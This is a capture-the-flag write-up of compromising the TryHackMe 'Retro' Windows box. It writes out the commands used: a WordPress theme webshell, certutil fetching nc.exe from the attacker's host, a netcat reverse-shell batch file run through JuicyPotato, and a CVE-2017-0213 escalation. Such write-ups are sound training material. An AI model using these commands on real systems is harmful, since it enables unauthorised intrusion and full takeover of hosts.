TryHackMe - Retro

Information Card

Brief

This was a good machine with really good way for privilege escalation. I didn’t enjoy the foothold part as much I enjoyed the privilege escalation part. There are two ways in which I privilege escalated this machine. We will utilize both CVE-2017-0213 and JuicyPotato to privilege escalate. Lets get started.

Reconnaissance

I use a tool called nmapAutomator and it is something I can recommend, alternatively you can also use AutoRecon.

NMap Basic Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

---------------------Starting Nmap Basic Scan---------------------

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 17:00 IST
Nmap scan report for retro (10.10.253.247)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2021-01-23T11:30:12+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2021-01-22T11:13:58
|_Not valid after: 2021-07-24T11:13:58
|_ssl-date: 2021-01-23T11:30:15+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds


OS Detection modified to: Windows

We have hence identified two services that are running : -

  • HTTP (80)
  • Remote Desktop Protocol (3389)

Enumeration

I first added the following lines to my /etc/hosts : 10.10.253.247 retro retro.thm. This help us in resolution incase there are virtual hosts.

Note : This is just my guess as I usually follow this convention when dealing with CTF boxes like HackTheBox and TryHackMe. Makes it easy to remember compared to an IP. If I come across the name of the machine during my enumeration I make changes to /etc/hosts to reflect new changes.

HTTP Enumeration

Visiting the machine at http://retro.thm gave me the default IIS page.

FFuF

I put ffuf to task to brute force the website for additional files and directories. I did it with the help of this command : ffuf -w $WORDLIST_MEDIUM -u http://retro.thm/FUZZ -e .aspx,.txt,.html,.php -c -replay-proxy http://127.0.0.1:8080. For any positive result I told ffuf to send it to my burpproxy running on localhost:8080.

Soon ffuf returned a directory called retro. After visiting the URL at http://retro.thm/retro it returned a wordpress site.

This Wordpress had quite some articles on it. I spread a cursory sight over them all and made wpscan do the required job.

WPScan

HTTP Landing Page

I made wpscan enumerate the newly discovered website via this command : wpscan --enumerate ap, vp, p, dbe, cb --url http://retro.thm/retro

Soon it returned that the version of Wordpress installed was Wordpress Version: 1.4.10 and all the posts were written by a user called Wade. I made a note of this information on a file called usernames. This will be helpful if we have to brute force our way in.

But while going through the website I looked at a post called Ready Player One which had a comment Leaving myself a note here incase I forget how to spell it: parzival. This felt a little odd.

Wade says

I used the username : wade and password parzival to login and sure enough it logged me in.

Wordpress Logged In.

Exploitation

Now, since we have access to the admin panel we can modify the themes in Wordpress to get a reverse shell. So I downloaded the webshell from this repository and changed the contents of the file in Appearances->Editor->404.php to the one of the shell. Then visiting this URL I had a web shell http://retro.thm/retro/wp-content/themes/90s-retro/404.php.

Download Netcat to victim machine

I then downloaded nc.exe to the victim machine with the help of certutil certutil.exe -urlcache -split -f http://10.11.21.208:8000/nc.exe and then gained a reverse shell to the victim via nc.exe.

Getting a reverse shell

A reverse shell

However, this is a service account we don’t have access to either Wade nor Administrator.

Privilege Escalation

First Method

I began enumerating the machine and then found out I had the SeImpersonatePrivilege on the service account I current had a shell as.

Impersonate Privilege Escalation

This meant JuicyPotato. I have a compiled version of juicy-potato here. I downloaded JuicyPotato to the victim machine and then tested for valid CLSID for Microsoft Windows Server 2016 Standard.

I downloaded the test_clsid.bat which is originally available here but I have a copy here. I then made a file called CLSID.list with some valid CLSID I assumed would work. I got the CLSID from here.

I then ran the batch script on the victim machine and fortunately found a valid CLSID that would allow me to impesonate as Administrator.

Testing for valid CLSID

Valid CLSID

Upon testing that I have a valid CLSID I created another script to give me a reverse shell. I named this file randomly as t.bat. Below are the contents for t.bat :

1
2
@echo off
C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\nc2.exe -e cmd 10.11.21.208 1235

Then downloaded this bat file from my machine to victim and then executed juicypotato.exe : juicypotato.exe -l 1337 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\t.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

Gaining a root shell

We are now Administrator.

Second Method

The credentials that worked for Wordpress also worked in giving us a RDP session i.e wade:parzival.You can use xfreerdp to achieve this like this xfreerdp /u:Wade /p:parzival /v:10.10.253.247 this then lands us inside the machine as Wade.

Remote Desktop Protocol

This build of Windows is vulnerable to CVE-2017-0213 Windows COM Privilege Escalation Vulnerability which you can read about here.

So I downloaded the exploit which is available here and then downloaded it on the victim machine. Post downloading the exploit I executed it which gave me a prompt as Administrator.

Exploiting CVE-2017-0213 to gain a reverse shell as Admin

Root Shell 2

Proof

echo|set /p="user.txt : " & more C:\Users\Wade\Desktop\user.txt.txt & echo|set /p="root.txt : " & more C:\Users\Administrator\Desktop\root.txt.txt & echo “Network Interfaces : ” & ipconfig & echo|set /p="whoami : " & whoami & echo|set /p="hostname : " & hostname

Proof